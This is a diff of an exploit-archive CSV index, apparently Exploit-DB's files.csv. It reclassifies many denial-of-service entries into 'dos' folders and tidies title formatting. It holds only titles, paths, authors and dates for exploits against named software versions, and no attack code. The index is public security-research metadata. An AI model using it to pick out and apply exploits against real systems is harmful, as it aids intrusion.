32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32365,platforms/php/webapps/32365.txt,"Paranews 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 @@ -29438,7 +29438,7 @@ id,file,description,date,author,platform,type,port 32654,platforms/windows/remote/32654.txt,"Microsoft Internet Explorer 8 - CSS 'expression' Property Cross-Site Scripting Filter Bypass Weakness",2008-12-11,"Rafel Ivgi",windows,remote,0 32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products 'logon_processing.jsp' SQL Injection Vulnerabilities",2008-12-11,"3d D3v!L",jsp,webapps,0 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0 -32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0 +32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0 32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service Vulnerability",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 @@ -29469,7 +29469,7 @@ id,file,description,date,author,platform,type,port 32685,platforms/php/webapps/32685.txt,"ViArt Shop 3.5 manuals_search.php manuals_search Parameter XSS",2008-12-29,"Xia Shing Zee",php,webapps,0 32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0 32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 -32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0 +32688,platforms/windows/dos/32688.py,"Winace 2.2 - Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,dos,0 32689,platforms/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0 32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow Vulnerability",2008-12-30,"Anton Khirnov",linux,remote,0 @@ -29543,7 +29543,7 @@ id,file,description,date,author,platform,type,port 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection Vulnerability",2009-01-28,buzzy,php,webapps,0 32767,platforms/php/webapps/32767.txt,"QuickCMS 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0 32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0 -32769,platforms/php/remote/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0 +32769,platforms/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,dos,0 32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta ",windows,local,0 32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 - (.m3u) Heap Buffer Overflow Vulnerability",2009-02-03,zer0in,windows,dos,0 @@ -30366,7 +30366,7 @@ id,file,description,date,author,platform,type,port 33689,platforms/multiple/remote/33689.as,"Adobe Flash Player <= 10.1.51 - Local File Access Information Disclosure Vulnerability",2010-03-03,"lis cker",multiple,remote,0 33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Remote File Upload Vulnerability",2010-03-03,indoushka,php,webapps,0 33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation 'error_msg_parameter' Cross-Site Scripting Vulnerability",2010-03-04,thebluegenius,jsp,webapps,0 -33707,platforms/windows/remote/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,remote,0 +33707,platforms/windows/dos/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,dos,0 33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 and 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 @@ -30401,7 +30401,7 @@ id,file,description,date,author,platform,type,port 33734,platforms/php/webapps/33734.txt,"DDL CMS 2.1 - 'blacklist.php' Cross-Site Scripting Vulnerability",2010-03-10,ITSecTeam,php,webapps,0 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE/XSS Injection Exploit",2014-06-13,"BLacK ZeRo",aix,webapps,0 -33737,platforms/hardware/remote/33737.py,"ZTE and TP-Link RomPager - DoS Exploit",2014-06-13,"Osanda Malith",hardware,remote,0 +33737,platforms/hardware/dos/33737.py,"ZTE and TP-Link RomPager - DoS Exploit",2014-06-13,"Osanda Malith",hardware,dos,0 33760,platforms/multiple/webapps/33760.txt,"Multiple Products 'banner.swf' Cross-Site Scripting Vulnerability",2010-03-15,MustLive,multiple,webapps,0 33761,platforms/asp/webapps/33761.txt,"Pars CMS 'RP' Parameter Multiple SQL Injection Vulnerabilities",2010-03-15,Isfahan,asp,webapps,0 33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 @@ -30497,7 +30497,7 @@ id,file,description,date,author,platform,type,port 33836,platforms/windows/shellcode/33836.txt,"Windows All Versions - Add Admin User Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",windows,shellcode,0 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0 33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0 -33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0 +33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 - Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0 33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33997,platforms/php/webapps/33997.txt,"NPDS Revolution 10.02 - 'download.php' Cross-Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0 @@ -30789,7 +30789,7 @@ id,file,description,date,author,platform,type,port 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent XSS",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting Vulnerability",2014-07-27,"Mayuresh Dani",php,webapps,0 34363,platforms/multiple/remote/34363.rb,"Firefox toString console.time Privileged Javascript Injection",2014-08-19,metasploit,multiple,remote,0 -34172,platforms/hardware/webapps/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,webapps,0 +34172,platforms/hardware/dos/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,dos,0 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI Vulnerability",2014-07-27,"black hat",php,webapps,0 34174,platforms/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Buffer Overflow Vulnerability",2010-08-18,"Luigi Auriemma",windows,remote,0 34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS 'news.php' Multiple SQL Injection Vulnerabilities",2010-06-21,"Th3 RDX",php,webapps,0 @@ -30815,7 +30815,7 @@ id,file,description,date,author,platform,type,port 34198,platforms/php/webapps/34198.txt,"Limny 2.1 - 'q' Parameter Cross-Site Scripting Vulnerability",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34200,platforms/hardware/remote/34200.txt,"Cisco Adaptive Security Response HTTP Response Splitting Vulnerability",2010-06-25,"Daniel King",hardware,remote,0 34201,platforms/linux/remote/34201.txt,"feh <= 1.7 - '--wget-timestamp' Remote Code Execution Vulnerability",2010-06-25,anonymous,linux,remote,0 -34203,platforms/hardware/webapps/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,webapps,0 +34203,platforms/hardware/dos/34203.txt,"Dlink DWR-113 Rev. Ax - CSRF Denial of Service",2014-07-30,"Blessen Thomas",hardware,dos,0 34204,platforms/php/webapps/34204.html,"SkaDate Lite 2.0 - Multiple CSRF And Persistent XSS Vulnerabilities",2014-07-30,LiquidWorm,php,webapps,80 34205,platforms/php/webapps/34205.py,"SkaDate Lite 2.0 - Remote Code Execution Exploit",2014-07-30,LiquidWorm,php,webapps,80 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 @@ -30837,7 +30837,7 @@ id,file,description,date,author,platform,type,port 34222,platforms/php/webapps/34222.html,"Grafik CMS 'admin.php' SQL Injection and Cross-Site Scripting Vulnerabilities",2010-06-29,"High-Tech Bridge SA",php,webapps,0 34223,platforms/cgi/webapps/34223.txt,"Miyabi CGI Tools 1.02 \'index.pl\' Remote Command Execution Vulnerability",2010-06-29,"Marshall Whittaker",cgi,webapps,0 34224,platforms/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery and HTML Injection Vulnerabilities",2010-06-29,TurboBorland,multiple,webapps,0 -34225,platforms/php/webapps/34225.txt,"TornadoStore 1.4.3 SQL Injection and HTML Injection Vulnerabilities",2010-06-29,"Lucas Apa",php,webapps,0 +34225,platforms/php/webapps/34225.txt,"TornadoStore 1.4.3 - SQL Injection and HTML Injection Vulnerabilities",2010-06-29,"Lucas Apa",php,webapps,0 34226,platforms/php/webapps/34226.txt,"System CMS Contentia 'news.php' SQL Injection Vulnerability",2010-06-30,GlaDiaT0R,php,webapps,0 34227,platforms/windows/dos/34227.txt,"Qt <= 4.6.3 - Remote Denial of Service Vulnerability",2010-06-29,"Luigi Auriemma",windows,dos,0 34228,platforms/linux/dos/34228.txt,"Mumble Murmur 1.2 - Denial of Service Vulnerability",2010-06-29,"Luigi Auriemma",linux,dos,0 @@ -31089,7 +31089,7 @@ id,file,description,date,author,platform,type,port 34502,platforms/windows/dos/34502.py,"Serveez 0.1.7 - 'If-Modified-Since' Header Stack Buffer Overflow Vulnerability",2009-08-09,"lvac lvac",windows,dos,0 34503,platforms/php/webapps/34503.txt,"Syntax Highlighter 3.0.83 - 'index.html' HTML Injection Vulnerability",2010-08-19,indoushka,php,webapps,0 34504,platforms/php/webapps/34504.txt,"Cacti <= 0.8.7 on Red Hat High Performance Computing (HPC) utilities.php filter Parameter XSS",2010-08-19,"Marc Schoenefeld",php,webapps,0 -34505,platforms/php/webapps/34505.txt,"MySQL <= 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability",2010-08-19,"Boris Reisig",php,webapps,0 +34505,platforms/php/dos/34505.txt,"MySQL <= 5.1.48 - 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability",2010-08-19,"Boris Reisig",php,dos,0 34506,platforms/linux/dos/34506.txt,"MySQL <= 5.1.48 - 'EXPLAIN' Denial Of Service Vulnerability",2010-08-20,"Bjorn Munch",linux,dos,0 34507,platforms/linux/remote/34507.txt,"Nagios XI 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-19,"Adam Baldwin",linux,remote,0 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 @@ -31679,7 +31679,7 @@ id,file,description,date,author,platform,type,port 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) _Patch_ DLM Vulnerability",2014-11-03,metasploit,hardware,remote,9100 35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 -35154,platforms/asp/webapps/35154.txt,"Sigma Portal 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,webapps,0 +35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service Vulnerability",2010-12-27,"Pouya Daneshmand",asp,dos,0 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 @@ -31842,13 +31842,13 @@ id,file,description,date,author,platform,type,port 35336,platforms/php/webapps/35336.txt,"TaskFreak 0.6.4 index.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0 35337,platforms/php/webapps/35337.txt,"TaskFreak 0.6.4 print_list.php Multiple Parameter XSS",2011-02-12,LiquidWorm,php,webapps,0 35338,platforms/php/webapps/35338.txt,"TaskFreak 0.6.4 rss.php HTTP Referer Header XSS",2011-02-12,LiquidWorm,php,webapps,0 -35339,platforms/multiple/remote/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - DoS (Resource Consumption)",2014-11-24,CovertCodes,multiple,remote,0 +35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - DoS (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0 35340,platforms/php/webapps/35340.txt,"Wordpress wpDataTables Plugin 1.5.3 - SQL Injection Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0 35341,platforms/php/webapps/35341.py,"Wordpress wpDataTables Plugin 1.5.3 - Unauthenticated Shell Upload Vulnerability",2014-11-24,"Claudio Viviani",php,webapps,0 35342,platforms/aix/dos/35342.txt,"RobotStats 1.0 - HTML Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",aix,dos,0 35343,platforms/php/webapps/35343.txt,"Smarty Template Engine <= 2.6.9 - '$smarty.template' PHP Code Injection Vulnerability",2011-02-09,jonieske,php,webapps,0 35344,platforms/php/webapps/35344.txt,"RobotStats 1.0 - (robot param) SQL Injection Vulnerability",2014-11-24,"ZoRLu Bugrahan",php,webapps,0 -35345,platforms/hardware/webapps/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,webapps,0 +35345,platforms/hardware/dos/35345.txt,"TP-Link TL-WR740N - Denial Of Service",2014-11-24,LiquidWorm,hardware,dos,0 35346,platforms/php/webapps/35346.txt,"DukaPress 2.5.2 - Path Traversal",2014-11-24,"Kacper Szurek",php,webapps,0 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 @@ -31909,9 +31909,9 @@ id,file,description,date,author,platform,type,port 35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0 35411,platforms/asp/webapps/35411.txt,"Kodak InSite 5.5.2 Troubleshooting/DiagnosticReport.asp HeaderWarning Parameter XSS",2011-03-07,Dionach,asp,webapps,0 35412,platforms/asp/webapps/35412.txt,"Kodak InSite 5.5.2 Pages/login.aspx Language Parameter XSS",2011-03-07,Dionach,asp,webapps,0 -35413,platforms/php/webapps/35413.php,"WordPress <=4.0 - Denial of Service Exploit",2014-12-01,SECURELI.com,php,webapps,80 -35414,platforms/php/webapps/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80 -35415,platforms/php/webapps/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,webapps,80 +35413,platforms/php/dos/35413.php,"WordPress <= 4.0 - Denial of Service Exploit",2014-12-01,SECURELI.com,php,dos,80 +35414,platforms/php/dos/35414.txt,"Wordpress < 4.0.1 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 +35415,platforms/php/dos/35415.txt,"Drupal < 7.34 - Denial of Service",2014-12-01,"Javer Nieto and Andres Rojas",php,dos,80 35416,platforms/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0 35417,platforms/php/webapps/35417.php,"WS Interactive Automne 4.1 - 'admin/upload-controler.php' Remote Arbitrary File Upload Vulnerability",2011-03-08,"AutoSec Tools",php,webapps,0 35418,platforms/php/webapps/35418.txt,"Inline Gallery WordPress Plugin 0.3.9 - 'do' Parameter Cross-Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0 @@ -31919,7 +31919,7 @@ id,file,description,date,author,platform,type,port 35420,platforms/hardware/webapps/35420.txt,"IPUX Cube Type CS303C IP Camera - (UltraMJCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0 35421,platforms/hardware/webapps/35421.txt,"IPUX CL5452/CL5132 IP Camera - (UltraSVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0 -35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0 +35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <= 13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0 36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 @@ -31927,7 +31927,7 @@ id,file,description,date,author,platform,type,port 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting and SQL Injection Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 - 'head.php' Cross-Site Scripting Vulnerability",2011-03-08,IRCRASH,php,webapps,0 -35432,platforms/linux/remote/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service Vulnerability",2011-03-01,"Buildbot Builder",linux,remote,0 +35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service Vulnerability",2011-03-01,"Buildbot Builder",linux,dos,0 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - (.m3u) Remote Stack Buffer Overflow Vulnerability",2011-03-09,KedAns-Dz,osx,remote,0 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure Vulnerability",2011-03-09,"Aaron Sigel",windows,remote,0 35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting Vulnerability",2011-03-10,"High-Tech Bridge SA",php,webapps,0 @@ -31960,7 +31960,7 @@ id,file,description,date,author,platform,type,port 35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability",2014-12-04,"Robert Cooper",cgi,webapps,80 35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass Vulnerability",2011-03-14,"DcLabs Security Research Group",multiple,remote,0 -35465,platforms/multiple/remote/35465.pl,"VLC Media Player 1.0.5 - (.ape) Denial of Service Vulnerability",2011-03-15,KedAns-Dz,multiple,remote,0 +35465,platforms/multiple/dos/35465.pl,"VLC Media Player 1.0.5 - (.ape) Denial of Service Vulnerability",2011-03-15,KedAns-Dz,multiple,dos,0 35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution Vulnerability",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0 35467,platforms/php/webapps/35467.txt,"SugarCRM <= 6.1.1 Information Disclosure Vulnerability",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0 35468,platforms/windows/remote/35468.pl,"Monkey's Audio - (.ape) Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0 @@ -32026,9 +32026,9 @@ id,file,description,date,author,platform,type,port 35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 35528,platforms/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps,0 35529,platforms/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection Authentication Bypass Exploit",2014-12-15,LiquidWorm,windows,webapps,0 -35530,platforms/windows/local/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.m3u)",2014-12-15,s-dz,windows,local,0 -35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.lst)",2014-12-15,s-dz,windows,local,0 -35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0 +35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.m3u)",2014-12-15,s-dz,windows,dos,0 +35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.lst)",2014-12-15,s-dz,windows,dos,0 +35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,dos,0 35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0 35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection Vulnerability",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35535,platforms/php/webapps/35535.php,"PHPads <= 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0 @@ -32338,7 +32338,7 @@ id,file,description,date,author,platform,type,port 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda Malith",windows,dos,0 35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 'SMExt' Parameter Cross Site Scripting Vulnerability",2011-06-21,"Gjoko Krstic",php,webapps,0 35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass Vulnerability",2011-06-22,128bit,asp,webapps,0 -35873,platforms/windows/remote/35873.txt,"Wireshark 1.4.5 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-17,rouli,windows,remote,0 +35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service Vulnerability",2011-06-17,rouli,windows,dos,0 35874,platforms/php/webapps/35874.txt,"Eshop Manager Multiple SQL Injection Vulnerabilities",2011-06-22,"Number 7",php,webapps,0 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross Site Scripting Vulnerability",2011-06-22,"High-Tech Bridge SA",php,webapps,0 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 @@ -32565,7 +32565,7 @@ id,file,description,date,author,platform,type,port 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 'cat' Parameter SQL Injection Vulnerability",2011-09-08,SubhashDasyam,php,webapps,0 36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 -36128,platforms/windows/remote/36128.txt,"Wireshark <= 1.6.1 Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,remote,0 +36128,platforms/windows/dos/36128.txt,"Wireshark <= 1.6.1 - Malformed Packet Trace File Remote Denial of Service Vulnerability",2011-09-08,Wireshark,windows,dos,0 36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0 36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 @@ -32938,7 +32938,7 @@ id,file,description,date,author,platform,type,port 36513,platforms/windows/remote/36513.txt,"IpTools 0.1.4 Tiny TCP/IP servers Directory Traversal Vulnerability",2012-01-06,demonalex,windows,remote,0 36514,platforms/windows/remote/36514.pl,"IPtools 0.1.4 Remote Command Server Buffer Overflow Vulnerability",2012-01-06,demonalex,windows,remote,0 36515,platforms/asp/webapps/36515.txt,"DIGIT CMS 1.0.7 Cross Site Scripting and SQL Injection Vulnerabilities",2012-01-07,"BHG Security Center",asp,webapps,0 -36516,platforms/windows/remote/36516.py,"Acunetix <=9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 +36516,platforms/windows/remote/36516.py,"Acunetix <= 9.5 - OLE Automation Array Remote Code Execution",2015-03-27,"Naser Farhadi",windows,remote,0 36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36519,platforms/windows/remote/36519.html,"WebGate eDVR Manager 2.6.4 - SiteName Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 @@ -33246,7 +33246,7 @@ id,file,description,date,author,platform,type,port 36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.PLS' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0 